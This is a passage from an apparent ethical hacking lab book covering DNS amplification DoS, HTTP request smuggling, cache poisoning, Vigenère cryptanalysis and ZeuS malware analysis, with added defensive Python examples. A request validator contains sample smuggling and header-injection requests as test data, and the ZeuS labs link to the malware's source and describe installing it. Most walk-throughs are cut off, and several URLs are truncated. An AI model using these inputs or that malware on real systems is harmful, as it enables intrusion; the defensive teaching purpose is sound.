behind legitimate DNS servers, and the more
IPs you input into the DNSlist.txt file, the
better. Needless to say, it is still illegal to do
something like this and highly unethical, so
please refrain from doing so unless DoS
attacks are specifically requested in the
contract between you and your client.
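From the defender's side, the signature of this attack at the victim's network edge is the mirror image of what the lab generates: large DNS answers arriving from many open resolvers for which no query ever left the network. The following added Python example (not from the book) replays a constructed set of DNS flow records, keeps a table of outstanding queries keyed by client, resolver and transaction ID, and flags a host that receives unsolicited responses from three or more distinct resolvers; the addresses reuse the lab's values, and the record format and threshold are assumptions for illustration.

```python
from collections import defaultdict

# Constructed DNS flow records (not captured from the lab). Fields:
# src_ip, src_port, dst_ip, dst_port, transaction id, qr (0 = query, 1 = response), UDP payload bytes.
RECORDS = [
    # A legitimate exchange: the Windows box asks 8.8.8.8 and receives one answer.
    ("192.168.77.155", 51000, "8.8.8.8", 53, 0x1A2B, 0, 60),
    ("8.8.8.8", 53, "192.168.77.155", 51000, 0x1A2B, 1, 120),
    # Reflected traffic: large answers from several resolvers, no matching outbound query.
    ("8.8.4.4", 53, "192.168.77.155", 53, 0x0001, 1, 3000),
    ("9.9.9.9", 53, "192.168.77.155", 53, 0x0002, 1, 3100),
    ("149.112.112.112", 53, "192.168.77.155", 53, 0x0003, 1, 2900),
    ("208.67.222.222", 53, "192.168.77.155", 53, 0x0004, 1, 3050),
]


def detect_reflection(records, min_resolvers=3):
    """Return {victim_ip: stats} for hosts receiving unsolicited DNS answers from
    at least `min_resolvers` distinct resolvers. `min_resolvers` is an assumed threshold."""
    pending = set()   # (client, resolver, txid) for queries seen leaving the network
    stats = defaultdict(lambda: {"unsolicited": 0, "resolvers": set(), "bytes": 0})
    for src, sport, dst, dport, txid, qr, length in records:
        if qr == 0 and dport == 53:
            pending.add((src, dst, txid))
        elif qr == 1 and sport == 53:
            key = (dst, src, txid)
            if key in pending:
                pending.discard(key)          # answer to a query we saw: benign
            else:
                entry = stats[dst]            # answer nobody here asked for
                entry["unsolicited"] += 1
                entry["resolvers"].add(src)
                entry["bytes"] += length
    return {victim: s for victim, s in stats.items() if len(s["resolvers"]) >= min_resolvers}


if __name__ == "__main__":
    for victim, s in detect_reflection(RECORDS).items():
        print("%s: %d unsolicited answers, %d bytes, from %d resolvers"
              % (victim, s["unsolicited"], s["bytes"], len(s["resolvers"])))
```

Matching on transaction ID as well as on the address pair is what keeps a resolver's late but legitimate answer from counting as reflection, and the byte total is what tells the on-call engineer how much bandwidth the victim is absorbing.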
Lab Objective:
Learn how to perform HTTP request
smuggling.
Lab Purpose:
HTTP request smuggling, as the name
implies, is an attack in which we can
“smuggle,” for example, request B while
making request A. This might seem
convoluted, so it is better to just show
immediately what that actually means
through a practical example.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
You can think of HTTP request smuggling as
a method by which other types of attacks can
be accomplished. It is a vulnerability in and
of itself, but it's most often used either for
information gathering or to facilitate another
type of attack. Another name for HTTP
response smuggling is the Carriage Return
Line Feed (CRLF) attack.
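The ambiguities a front end and a back end can disagree on are visible in the raw request itself: a Content-Length header next to a Transfer-Encoding header, two Content-Length values that differ, a Transfer-Encoding name with stray whitespace, or a bare CR or LF inside a header line. The added Python example below (not from the book) is a request validator of the kind a reverse proxy or WAF rule set applies before forwarding, run over constructed requests; the finding strings and the sample requests are assumptions for illustration.

```python
# Constructed sample requests (not taken from OWASP BWA).
CLEAN = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
         b"Content-Length: 8\r\n\r\na=1&b=22")
CL_TE = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
         b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n")
OBFUSCATED_TE = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
                 b"Content-Length: 3\r\nTransfer-Encoding : chunked\r\n\r\nabc")
DUPLICATE_CL = (b"POST /login HTTP/1.1\r\nHost: example.test\r\n"
                b"Content-Length: 3\r\nContent-Length: 5\r\n\r\nabc")
BARE_LF = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
           b"X-Forwarded-For: 10.0.0.1\nX-Injected: yes\r\n\r\n")


def check_request(raw: bytes):
    """Return a list of framing problems found in a raw HTTP/1.1 request.
    An empty list means both a front end and a back end would agree on its length."""
    findings = []
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["no end of headers"]
    header_lines = head.split(b"\r\n")[1:]          # skip the request line
    cl_values, te_values = [], []
    for line in header_lines:
        if b"\r" in line or b"\n" in line:          # survived the CRLF split: a lone CR/LF
            findings.append("bare CR or LF inside a header line")
        if b":" not in line:
            findings.append("malformed header line")
            continue
        name, value = line.split(b":", 1)
        if name != name.rstrip():                   # "Transfer-Encoding : chunked"
            findings.append("whitespace before header colon")
        key = name.strip().lower()
        if key == b"content-length":
            cl_values.append(value.strip())
        elif key == b"transfer-encoding":
            te_values.append(value.strip().lower())
    if cl_values and te_values:
        findings.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl_values)) > 1:
        findings.append("conflicting Content-Length values")
    if any(not v.isdigit() for v in cl_values):
        findings.append("non-numeric Content-Length")
    if any(v != b"chunked" for v in te_values):
        findings.append("unusual Transfer-Encoding")
    # Only when a single numeric Content-Length is the sole framing can we verify it.
    if cl_values and not te_values and len(set(cl_values)) == 1 and cl_values[0].isdigit():
        if int(cl_values[0]) != len(body):
            findings.append("Content-Length does not match body length")
    return findings


if __name__ == "__main__":
    for name, req in (("clean", CLEAN), ("cl_te", CL_TE), ("obfuscated_te", OBFUSCATED_TE),
                      ("duplicate_cl", DUPLICATE_CL), ("bare_lf", BARE_LF)):
        print(name, "->", check_request(req) or "ok")
```

Rejecting, rather than repairing, anything the validator flags is the safe choice: a proxy that silently picks one interpretation is exactly the component that creates the desync.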
Lab Objective:
Learn how to perform web cache poisoning.
Lab Purpose:
We'll go one step further in this lab with
regard to the HTTP splitting attack shown in
the previous one. As most servers maintain
some kind of logs, by poisoning them we can
add functionality to our exploit. Oftentimes
you will find that in exercises for practicing
log poisoning the end goal is to achieve RCE
(Remote Code Execution).
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, we’re simply continuing off from the
previous lab, meaning you are likely greeted
with the following web page:
Lab Objective:
Learn how to utilize Windows cryptography
tools.
Lab Purpose:
Sometimes you will be unable to use Linux in
your ethical hacking engagements and, seeing
how Windows is the dominant OS for client
machines, it pays to be familiar with it and
the tools we can run on it.
Lab Tool:
CrypTool.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
We'll look at two tools in this lab, namely
CrypTool and HashCalc, which can be
downloaded from the following URLs:
https://www.cryptool.org/en/ct1/downloads
https://www.slavasoft.com/hashcalc/index.htm
Lab Objective:
Learn how to perform cryptanalysis.
Lab Purpose:
Cryptanalysis is the process of taking a
ciphertext and breaking its encryption in
order to read the plaintext. We will be
looking at the cryptanalysis of the Vigenère
cipher.
Lab Tool:
CrypTool.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
As in our previous lab, start CrypTool on
your Windows machine and encrypt the
sample text with a Vigenère cipher using the
key “test.”
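CrypTool automates the analysis, but the steps it performs are short enough to write out. The following added Python example (not the book's and not CrypTool's code) encrypts a constructed English passage with the key “test” used above, estimates the key length from the index of coincidence of each column, recovers each key letter with a chi-squared comparison against English letter frequencies, and decrypts; the frequency table is the standard English one, and the search bound and tolerance are assumptions.

```python
import math
import string
from collections import Counter
from functools import reduce

ALPHA = string.ascii_uppercase

# Relative frequencies (percent) of the letters A..Z in English text, a standard table.
ENGLISH_FREQ = [8.167, 1.492, 2.782, 4.253, 12.702, 2.228, 2.015, 6.094, 6.966,
                0.153, 0.772, 4.025, 2.406, 6.749, 7.507, 1.929, 0.095, 5.987,
                6.327, 9.056, 2.758, 0.978, 2.360, 0.150, 1.974, 0.074]


def letters_only(text):
    """Keep A-Z only, upper-cased, as the classical cipher does."""
    return "".join(ch for ch in text.upper() if ch in ALPHA)


def vigenere(text, key, decrypt=False):
    """Encrypt (or decrypt) text with a repeating-key Vigenere cipher."""
    text, key = letters_only(text), letters_only(key)
    out = []
    for i, ch in enumerate(text):
        k = ALPHA.index(key[i % len(key)])
        if decrypt:
            k = -k
        out.append(ALPHA[(ALPHA.index(ch) + k) % 26])
    return "".join(out)


def index_of_coincidence(s):
    """Probability that two letters drawn from s are equal: about 0.066 for English, 0.038 for random letters."""
    n = len(s)
    if n < 2:
        return 0.0
    return sum(c * (c - 1) for c in Counter(s).values()) / (n * (n - 1))


def columns(ct, length):
    """Split the ciphertext into the `length` columns that share one key letter."""
    return [ct[i::length] for i in range(length)]


def estimate_key_length(ct, max_len=12, tolerance=0.007):
    """Average the per-column IoC for each candidate length. The true length and its
    multiples all score like English, so return the gcd of every length close to the best.
    max_len and tolerance are assumed settings."""
    scores = {L: sum(index_of_coincidence(c) for c in columns(ct, L)) / L
              for L in range(1, max_len + 1)}
    best = max(scores.values())
    return reduce(math.gcd, [L for L, s in scores.items() if s >= best - tolerance])


def best_shift(column):
    """Recover one column's Caesar shift by chi-squared distance to English frequencies."""
    n = len(column)
    best, best_chi = 0, float("inf")
    for shift in range(26):
        counts = Counter(ALPHA[(ALPHA.index(ch) - shift) % 26] for ch in column)
        chi = sum((counts.get(ALPHA[i], 0) - n * p / 100) ** 2 / (n * p / 100)
                  for i, p in enumerate(ENGLISH_FREQ))
        if chi < best_chi:
            best, best_chi = shift, chi
    return best


def recover_key(ct, length):
    return "".join(ALPHA[best_shift(c)] for c in columns(ct, length))


def break_vigenere(ct, max_len=12):
    length = estimate_key_length(ct, max_len)
    key = recover_key(ct, length)
    return key, vigenere(ct, key, decrypt=True)


# Constructed sample plaintext (ordinary English, long enough for the statistics to work).
SAMPLE_PLAINTEXT = """The Vigenere cipher was once believed to be unbreakable because the same
plaintext letter can be enciphered to many different ciphertext letters depending on its
position under the key. Friedrich Kasiski published a general method of attack in the
nineteenth century. He observed that repeated groups of letters in the ciphertext are often
produced by the same plaintext fragment falling under the same part of the key, so the
distances between such repeats tend to be multiples of the key length. William Friedman
later introduced the index of coincidence, which measures how likely two randomly chosen
letters of a text are to be equal. Natural English has a noticeably higher index than random
text, and splitting the ciphertext into columns by a guessed key length restores that
signature only when the guess is right. Once the key length is known each column is a simple
shift cipher that can be solved by comparing letter frequencies with those of ordinary English.
A careful analyst never trusts a single statistic. The key length suggested by the index of
coincidence should agree with the distances between repeated trigrams, and the recovered key
should turn the whole ciphertext into readable language rather than a few plausible words.
When the message is short the columns contain too few letters for frequency analysis to be
reliable, which is why historical operators were told to change keys often and to avoid long
messages under one key. Modern stream and block ciphers do not leak such statistics, but the
same habits of measuring, guessing and checking remain at the heart of cryptanalysis today."""
CIPHERTEXT = vigenere(SAMPLE_PLAINTEXT, "test")

if __name__ == "__main__":
    key, plain = break_vigenere(CIPHERTEXT)
    print("recovered key:", key)
    print(plain[:72])
```

The same two statistics are what CrypTool's analysis window reports; the gcd step is what keeps the estimate from returning 8 or 12 when those lengths happen to score as well as 4.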
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
In these last four labs, we'll tackle one of the
most complex aspects of CEH and cyber
security in general, and that is malware
analysis. For the first lab in the series, we'll
cover installing the malware onto our
Windows 7 VM.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
To start things off, go to the following URL:
https://github.com/Visgean/Zeus and
download the ZIP archive onto your
Windows machine.
Then go to
https://sourceforge.net/projects/xampp/files/XAMPP%20W
download the 5.6.40-1-VC11-installer.exe
file and install it, leaving everything as
default except unchecking the “Learn more
about Bitnami for XAMPP” option.
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
In this lab, we’ll pick up from where we left
in our previous one and go through the
exploitation phase of the ZeuS/zBot malware.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Before anything else, we should download a
couple of packet capturing tools for Windows,
namely Message Analyzer from either of
these two URLs:
https://github.com/riverar/messageanalyzer-
archive/blob/master/releases/1.4/MessageAnalyzer64.m
https://web.archive.org/web/20191106164517/http://ww
us/download/details.aspx?id=44226.
https://www.microsoft.com/en-
us/download/4865.
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
This is the penultimate Lab in the malware
analysis segment and in general. Here we’ll
take a look at what it is that ZeuS malware
does upon infecting a target and how to
identify it.
Lab Tool:
Wireshark.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
So, we've opened our three tools of choice,
namely Network Monitor, Message Analyzer
and Wireshark, each with its respective
capture file: Network Monitor made its own
capture, Message Analyzer uses the .etl file
we generated through Windows' cmd.exe,
and Wireshark uses the .cap file that we
exported from Message Analyzer.
https://s3.amazonaws.com/talos-
intelligence-
site/production/document_files/files/000/000/079/origin
sample-2.pcap.
Lab Objective:
A final look back at malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
For the final Lab in these CEH 101 Labs,
we’ll work on consolidating our malware
analysis knowledge and look at the various
types of tools and resources that can help us
in this endeavor.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
So, the first thing we did was find the
source code for the malware we want to
analyze, such as the one found on this GitHub
page: https://github.com/Visgean/Zeus. We
then set up our analysis environment by
downloading all of the relevant tools, namely:
https://www.secureworks.com/research/zeus.
https://www.malwarebytes.com/resources/files/2020/05/
silent-night-zloader-zbot_final.pdf.